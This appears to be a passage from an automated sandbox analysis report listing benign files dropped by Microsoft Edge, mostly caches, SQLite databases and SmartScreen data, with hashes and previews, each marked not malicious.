                                                                                                                                                                  Preview:7....-............k.89m..R..<............k.89m.....iSQLite format 3......@ ..........................................................................S`............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4096
                                                                                                                                                                  Entropy (8bit):0.09255907315217722
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:lSWFN3l/klslpL/lvXll:l9F8E1l
                                                                                                                                                                  MD5:D0ADE2BC9FC14FB88A095213DAA00A9B
                                                                                                                                                                  SHA1:D6615FE9FDF369535907683CF80EABA7F47D9535
                                                                                                                                                                  SHA-256:855E259F99088D8E801B79C64C4D332D272B8179765E2B2EA1F305BA58FECB8C
                                                                                                                                                                  SHA-512:927A031EB3F940F868B97EBC464106C547548D168057EF414E7CDE4373053A3DD355860D52A14FC0368C23B7589992CD9D4FE59B8E7D7F3E45F1E41F6180BA5B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data-journal

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4616
                                                                                                                                                                  Entropy (8bit):0.1374164954672919
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:7FEG2l+zQkl/FllkpMRgSWbNFl/sl+ltlslVFolvXll0v:7+/lRyg9bNFlEs1EvoMv
                                                                                                                                                                  MD5:98872F837D7F6731C21386CBC5759BEC
                                                                                                                                                                  SHA1:98D28BC6851B1BBB442E0508856C04ABD5AFDCC1
                                                                                                                                                                  SHA-256:32C5E47906E2492107E389B6D7A30953A47D727044CE5EA85C0EAEAA3810E067
                                                                                                                                                                  SHA-512:AEC0D6594601E225FD4E1A37E940F5925C80E93178E1162B636F14FB3F9C710F3B2BEFD84A975ED7FECBFD41CCED9EB843AF2C93B2A3654053CCBB0D08930058
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.... .c.....V5@.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................S`................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data-wal

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):45352
                                                                                                                                                                  Entropy (8bit):0.3943074760736888
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:KX0V4l8QuzRDHZll7DBtDi4kZERDHuyTeqt8VtbDBtDi4kZERDJRs:40VnQMDZll7DYMbuyTeO8VFDYM7s
                                                                                                                                                                  MD5:A4EF78B71F5DC1B78C1E9FCEBEA05B77
                                                                                                                                                                  SHA1:C3904311AA16A96D10EEAD2824F4976AEA3214EF
                                                                                                                                                                  SHA-256:44A3E1FA4FB874BB7C82D9361438DE0595773A9EE14D1A6CA70B0816A0917210
                                                                                                                                                                  SHA-512:086BB268FF0E49FDCC96C301084819E0DE84A420D87EBFF57E1CC0FA3F7C0B9D50E1741433B0190FE9F07F4D71E4B350A3151B7F4974AA5AE8592CA589B62DFA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:7....-..........{#.].dY.2.&...c.........{#.].dY.LO$L=d:DSQLite format 3......@ ..........................................................................S`............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_2

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                  Entropy (8bit):9.629307656487099E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:LsFl0l+:LsFK+
                                                                                                                                                                  MD5:9ED56F0466B80898404204B0BEF6EBC7
                                                                                                                                                                  SHA1:7A689D34BDCE9C22F3CBB86F98934AD2A0A5D0F1
                                                                                                                                                                  SHA-256:CCBFEE2D78D7E898954290E633B4589A14DD09E7910979E370B67A07D1890EE2
                                                                                                                                                                  SHA-512:67D93BDF93E97C92557F0DBFC2F06F12B47793A18F3202A9A323D5C1A198D865CF880F686E92A0FA80D5285CFE0ACDFB957D4E970E1DE1A4FD15F1377E107F08
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................#.*.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):11
                                                                                                                                                                  Entropy (8bit):2.59490661824394
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:gem3:gL3
                                                                                                                                                                  MD5:E60DFE28E77A79CD2CAA4F53BD711995
                                                                                                                                                                  SHA1:2A150938498D9778DAF21F87B3E52ABDD4084716
                                                                                                                                                                  SHA-256:D5E1FB030857E079A8FD6811C81BF756D23CED9AF5DC299354C88F89B763415E
                                                                                                                                                                  SHA-512:B2ED5D4C3EEB946C2C869988E227ACD771614D559E1C108578546AA919E74251B92C7A1241D5E113018AB20A4295BBBCC12B7C520FB1C13DB242EC1B02B74F43
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:94.0.992.31

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_2

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_3

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                  Entropy (8bit):9.629307656487099E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:LsFl0libsal:LsFK0
                                                                                                                                                                  MD5:10DCE7E0CDBACBEE8B490F16539AB58A
                                                                                                                                                                  SHA1:A1B4C59B03B86715271919B04AD0B365B8102E27
                                                                                                                                                                  SHA-256:6980B64BD87AFBC78500DBBEEAF4E838C5F71DF58FBFDAA59CD1363D1EDD83BE
                                                                                                                                                                  SHA-512:67F9D229A3E80F805F9B4AEFD5DBD223DD4A8BD41E41D4905D9BB4F71BE49E1A33D068BF57436AD210B022E80DA4989337EDECD2F3253832EA01853CA33734E6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.........................................'..../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\cache

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:COM executable for DOS
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):184
                                                                                                                                                                  Entropy (8bit):0.6472473490380266
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:s3lt/elaaRH:sVwpH
                                                                                                                                                                  MD5:24127606DAC5CC6142848B0387A3AFB6
                                                                                                                                                                  SHA1:2DD825CBA2DED5F73DE2F70D3056764788D6B3CD
                                                                                                                                                                  SHA-256:7680B8117DCE679EAF37A1C4670506FDA78781CFCD994295B5108DB18FBBC3A8
                                                                                                                                                                  SHA-512:0C37B62B580255716371554CD47A1D7AA15A92B5376FF66D42CACF1E2FD95C027E7F8781231C4B0D9CCC17521A94F1E719CFD2307853D6D7D72DD8155BA6868B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:..............@?........................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\download_cache

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:COM executable for DOS
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):184
                                                                                                                                                                  Entropy (8bit):0.6472473490380266
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:s3lt/elaaRH:sVwpH
                                                                                                                                                                  MD5:24127606DAC5CC6142848B0387A3AFB6
                                                                                                                                                                  SHA1:2DD825CBA2DED5F73DE2F70D3056764788D6B3CD
                                                                                                                                                                  SHA-256:7680B8117DCE679EAF37A1C4670506FDA78781CFCD994295B5108DB18FBBC3A8
                                                                                                                                                                  SHA-512:0C37B62B580255716371554CD47A1D7AA15A92B5376FF66D42CACF1E2FD95C027E7F8781231C4B0D9CCC17521A94F1E719CFD2307853D6D7D72DD8155BA6868B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:..............@?........................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\warnStateCache

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                  Entropy (8bit):1.23900521981086
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MlwlaaRX:kwpX
                                                                                                                                                                  MD5:3F66F244278461DD07A3FEB77A17712F
                                                                                                                                                                  SHA1:8D570B550699AD0F248EC98B5D678F54248C0A84
                                                                                                                                                                  SHA-256:203CE5C7C1680C6E98F5CECA920E9D904122A9E26A743191E9B0FE1F6584ED60
                                                                                                                                                                  SHA-512:8D4733222E2E0BBC18370055D0602D0389E7A562887E97B2E54073017FFEA024E9B1341ED95E28883861EF5E0D4FA9D27ED0894912FFE167632AED2E4CF53E7D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:H.......0.....@?........................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                  Entropy (8bit):4.3251519737725435
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:kDnaV6bVqAEdHTdTRrjMwdLUBTiEdCdhHQVCU:kDYaEHTdJ6igmRAX
                                                                                                                                                                  MD5:F222079E71469C4D129B335B7C91355E
                                                                                                                                                                  SHA1:0056C3003874EFEF229A5875742559C8C59887DC
                                                                                                                                                                  SHA-256:E713C1B13A849D759EBAA6256773F4F1D6DFC0C6A4247EDAA726E0206ECACB00
                                                                                                                                                                  SHA-512:E5A49275E056B6628709CF6509A5F33F8D1D1E93125EAA6EC1C7F51BE589FD3D8EA7A59B9639DB586D76A994AD3DC452C7826E4AC0C8C689DD67FF90E33F0B75
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):129085
                                                                                                                                                                  Entropy (8bit):3.7540186287711013
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:+lIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:beWGP7Eh
                                                                                                                                                                  MD5:6698422BEA0359F6D385A4D059C47301
                                                                                                                                                                  SHA1:B1107D1F8CC1EF600531ED87CEA1C41B7BE474F6
                                                                                                                                                                  SHA-256:2F9188B68640DBF72295F9083A21D674A314721EF06F82DB281CBCB052FF8EC1
                                                                                                                                                                  SHA-512:D0CDB3FA21E03F950DBE732832E0939A4C57EDC3B82ADB7A556EBD3A81D219431A440357654DFEA94D415BA00FD7DCBD76F49287D85978D12C224CBFA8C1AD8D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "models": [.. {.. "name": "techScamTitleModel:2019-10-07",.. "samplingRate": 0.001,.. "bias": -2.03588432962421,.. "terms": [.. {.. "features": [.. "title".. ],.. "delimiters": "|;.\\/?*!\") ",.. "lengthWeight": -0.235096784475425,.. "tokenWeights": [.. {.. "key": "d8f3f4c31da2fa20a04f3c70536aee37",.. "value": 4.96485538534717.. },.. {.. "key": "902db872ede3fa9e92ed917ae1f2f0c9",.. "value": 16.0666261016159.. },.. {.. "key": "f2eb27b63a38b45c6a6bed8b65c6eeaf",.. "value": 4.27859685905943E-15.. },.. {.. "key": "3c0ee507a9a6de7849f17e20e3e931e1",.. "value": 9.49072317921467.. },.. {.. "key": "a500a663a3dfeebdbac0a28ed87d522c",.. "value": 15.1855052242444.. },..

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                  Entropy (8bit):4.346439344671015
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                  MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                  SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                  SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                  SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris_638343870221005468

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                  Entropy (8bit):4.556488479039065
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                  MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                  SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                  SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                  SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                  Entropy (8bit):4.030394788231021
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                  MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                  SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                  SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                  SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:topTraffic_638004170464094982

